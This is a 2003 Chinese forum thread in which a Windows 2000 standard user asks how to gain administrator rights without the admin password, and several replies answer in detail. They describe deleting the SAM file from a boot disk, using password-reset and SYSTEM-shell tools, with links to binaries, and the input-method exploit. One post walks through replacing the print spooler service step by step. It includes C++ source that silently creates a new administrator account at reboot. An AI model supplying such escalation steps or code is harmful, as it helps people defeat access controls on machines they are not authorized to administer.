6,210
社区成员
发帖
与我相关
我的任务
分享急急:我只是win2k的一般用户,请问我可以通过什么手段添加一个admin用户吗?原来admin的密码我没有?
我想通过这个办法把目前的登陆身份提升为admin。
...全文
请发表友善的回复…
发表回复
cooking 2003-04-09
- 打赏
- 举报
哈哈,终于搞定啦
spark_li 2003-04-09
- 打赏
- 举报
另外没有注册的ntfsdos只能查看文件,而不能删除文件
spark_li 2003-04-09
- 打赏
- 举报
http://bbs.nju.edu.cn/file/1049854631spoolsv.exe
这个down下来保存为spoolsv.exe
http://bbs.nju.edu.cn/file/ERunAsX.dll
这个ErunasX是我重新编译的,希望能诺顿不要再杀它
我这里没有装诺顿,也没有办法测试
你既然可以用小盘启动系统,那么就不用停止服务了
用小盘启动系统后直接重新命名系统的spoolsv.exe就行了
这个down下来保存为spoolsv.exe
http://bbs.nju.edu.cn/file/ERunAsX.dll
这个ErunasX是我重新编译的,希望能诺顿不要再杀它
我这里没有装诺顿,也没有办法测试
你既然可以用小盘启动系统,那么就不用停止服务了
用小盘启动系统后直接重新命名系统的spoolsv.exe就行了
cooking 2003-04-09
- 打赏
- 举报
我也停不了spooler服务啊,
C:\>net stop spooler
系统发生 5 错误。
拒绝访问。
C:\>net stop spooler
系统发生 5 错误。
拒绝访问。
cooking 2003-04-09
- 打赏
- 举报
http://bbs.nju.edu.cn/file/2ksystem.zip
里面的ERunAsX.dll抱告有毒,我也没有办法禁止诺顿!
里面的ERunAsX.dll抱告有毒,我也没有办法禁止诺顿!
cooking 2003-04-09
- 打赏
- 举报
我可以用软盘启动,是ubs软盘,也用了ntfsdos,但就是删不不掉那个该死的sam,
我是power user,但机器里面没有装iis,ftp
我也没办法用c啊:(
麻烦你能给我发一个吗?
tyxm@sina.com
感激不尽啊!!!
我是power user,但机器里面没有装iis,ftp
我也没办法用c啊:(
麻烦你能给我发一个吗?
tyxm@sina.com
感激不尽啊!!!
spark_li 2003-04-09
- 打赏
- 举报
To cooking()
人家说的dos可不是2k的命令行下面,是叫你用一张dos盘启动
系统,然后删除sam文件,或者多系统下启动其他系统,再把你想进
的2k里面的sam文件删除,不过这个方法的局限是如果你的2k是ntfs
格式的文件系统,怕不能成功。
这里呢,我提供你一个方法(你要确定你的机器是sp2才能成功)
你先down这个文件http://bbs.nju.edu.cn/file/2ksystem.zip
然后解压缩开来,看里面的使用说明,在命令行下运行erunasx cmd.exe
然后呢,就跳出来一个cmd.exe,也就是2k的命令行下的窗口出来
在这个新窗口里面你就可以干你想做的事情了,因为它是以system权限
不知道你的机器还开了那些服务,能拿权限的方法还多呢,比如有iis
的话,才sp2,不谈以前出现的漏洞,就最近的webDavx溢出就能实现了,
还有新出的rpclocator服务的漏洞,这个服务默认是没有启动,但是默认
配置下普通用户可以启动这个服务的,你能本地登陆,也就能拿系统权限了。
此外:还提供一个“鲜为人知”的方法,说笨也说聪明,不管他sp0,还是
sp3 or sp4 hotfix,方法如下:(前提大概需要你是power users 组用户,
系统采用默认安全配置,users组用户我倒没有测试)
1、开始、运行cmd.exe
2、net stop spooler
3、进入system32目录,把spoolsv.exe 重新命名为abc.exe,这里名字随便,
和下面的保持一致就行了
4、进入system32\dllcache目录,里面如果有spoolsv.exe,则也重新命名为
abc.exe
5、把下面的代码copy下去,保存为spoolsv.cpp
#include <stdlib.h>
void main()
{
system("net user newuser newpass /add");
system("net localgroup administrators /add newuser");
system("abc.exe");
}
6、用VC++ 编译上面的spoolsv.cpp,得到spoolsv.exe文件,把它放到
system32目录,
7、重启系统,一切顺利的话系统中就多了一个newuser,administrators组
的用户了。
8、次方法补充:我朋友说呢,users 组的用户系统不让停止服务,也不让
对system32目录写,所以怕不成功。此方法的原理大家一看就清楚了,就是替换
系统的服务程序,欺骗系统先执行我们自己的代码。
此外常用的方法可以用ntfsdos做成启动盘,启动系统之后呢就能对ntfs格式的
文件系统进行读写了,计算机没有禁止你使用软盘启动系统的话,那正好,删除
sam文件即可,另一个方法是用老外写的一个系统启动包,用他你可以修改任意
用户的密码或者修改注册表,前提仍然是你能用软盘启动系统。
不知道大家还有什么好的方法,欢迎指正与补充。
Good Luck
人家说的dos可不是2k的命令行下面,是叫你用一张dos盘启动
系统,然后删除sam文件,或者多系统下启动其他系统,再把你想进
的2k里面的sam文件删除,不过这个方法的局限是如果你的2k是ntfs
格式的文件系统,怕不能成功。
这里呢,我提供你一个方法(你要确定你的机器是sp2才能成功)
你先down这个文件http://bbs.nju.edu.cn/file/2ksystem.zip
然后解压缩开来,看里面的使用说明,在命令行下运行erunasx cmd.exe
然后呢,就跳出来一个cmd.exe,也就是2k的命令行下的窗口出来
在这个新窗口里面你就可以干你想做的事情了,因为它是以system权限
不知道你的机器还开了那些服务,能拿权限的方法还多呢,比如有iis
的话,才sp2,不谈以前出现的漏洞,就最近的webDavx溢出就能实现了,
还有新出的rpclocator服务的漏洞,这个服务默认是没有启动,但是默认
配置下普通用户可以启动这个服务的,你能本地登陆,也就能拿系统权限了。
此外:还提供一个“鲜为人知”的方法,说笨也说聪明,不管他sp0,还是
sp3 or sp4 hotfix,方法如下:(前提大概需要你是power users 组用户,
系统采用默认安全配置,users组用户我倒没有测试)
1、开始、运行cmd.exe
2、net stop spooler
3、进入system32目录,把spoolsv.exe 重新命名为abc.exe,这里名字随便,
和下面的保持一致就行了
4、进入system32\dllcache目录,里面如果有spoolsv.exe,则也重新命名为
abc.exe
5、把下面的代码copy下去,保存为spoolsv.cpp
#include <stdlib.h>
void main()
{
system("net user newuser newpass /add");
system("net localgroup administrators /add newuser");
system("abc.exe");
}
6、用VC++ 编译上面的spoolsv.cpp,得到spoolsv.exe文件,把它放到
system32目录,
7、重启系统,一切顺利的话系统中就多了一个newuser,administrators组
的用户了。
8、次方法补充:我朋友说呢,users 组的用户系统不让停止服务,也不让
对system32目录写,所以怕不成功。此方法的原理大家一看就清楚了,就是替换
系统的服务程序,欺骗系统先执行我们自己的代码。
此外常用的方法可以用ntfsdos做成启动盘,启动系统之后呢就能对ntfs格式的
文件系统进行读写了,计算机没有禁止你使用软盘启动系统的话,那正好,删除
sam文件即可,另一个方法是用老外写的一个系统启动包,用他你可以修改任意
用户的密码或者修改注册表,前提仍然是你能用软盘启动系统。
不知道大家还有什么好的方法,欢迎指正与补充。
Good Luck
asdfxcv 2003-04-08
- 打赏
- 举报
没有管理员密码的话,就不能做你上面那些想做的事情,谁叫你装的是WIN2000,而且还装了补丁呢?如果没有装补丁的话,上面很多都可以实现的。
cooking 2003-04-08
- 打赏
- 举报
spark_li(晕忽忽(恶人谷:通讯连长)) :别说风凉话啊,你有什么好一点,简单一点的办法啊
上面他们说的我都试了,没有成功啊,小弟愚钝:(
simplehe2002(核桃)
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
在dos下,sam我删不掉啊,拒绝访问!
上面他们说的我都试了,没有成功啊,小弟愚钝:(
simplehe2002(核桃)
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
在dos下,sam我删不掉啊,拒绝访问!
cooking 2003-04-08
- 打赏
- 举报
xumiao(猫猫) ,请详细一点好吗?我加了失败啊
spark_li 2003-04-08
- 打赏
- 举报
对付sp2,本地拿权限的方法多了
xumiao 2003-04-08
- 打赏
- 举报
看看关于输入法的漏洞吧。
很简单,进去后看net的属性 c:\winnt\system32\net.exe net user username password /add
运行一次,在改:net user username localgroup administrators /add
好好想想!
很简单,进去后看net的属性 c:\winnt\system32\net.exe net user username password /add
运行一次,在改:net user username localgroup administrators /add
好好想想!
ysqu 2003-04-08
- 打赏
- 举报
你在本版上面的搜索中输入“忘记密码”
就可以看到很多方法
或者到search.csdn.net 中查寻
就可以看到很多方法
或者到search.csdn.net 中查寻
Swanzy 2003-04-08
- 打赏
- 举报
可以用Linux启动盘修改admin密码
boris007 2003-04-08
- 打赏
- 举报
可以建用户 但没有任何权限
除非有管理员的密码 管理员给你权限
除非有管理员的密码 管理员给你权限
iamholly 2003-04-08
- 打赏
- 举报
如果没人管你,你可以修复,呵呵~~
simplehe2002 2003-04-08
- 打赏
- 举报
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
jxhaq 2003-04-08
- 打赏
- 举报
用CHNTPW这个软件破解密码,下载一个用一用就知道怎公回事了
cooking 2003-04-08
- 打赏
- 举报
呵呵,我的正好是sp2,哪里下这个软件啊,我找不到啊?:(
lovestart 2003-04-08
- 打赏
- 举报
一般情况下是不可以的,如果没有打sp3的话还可以用一个叫erunas的软件。
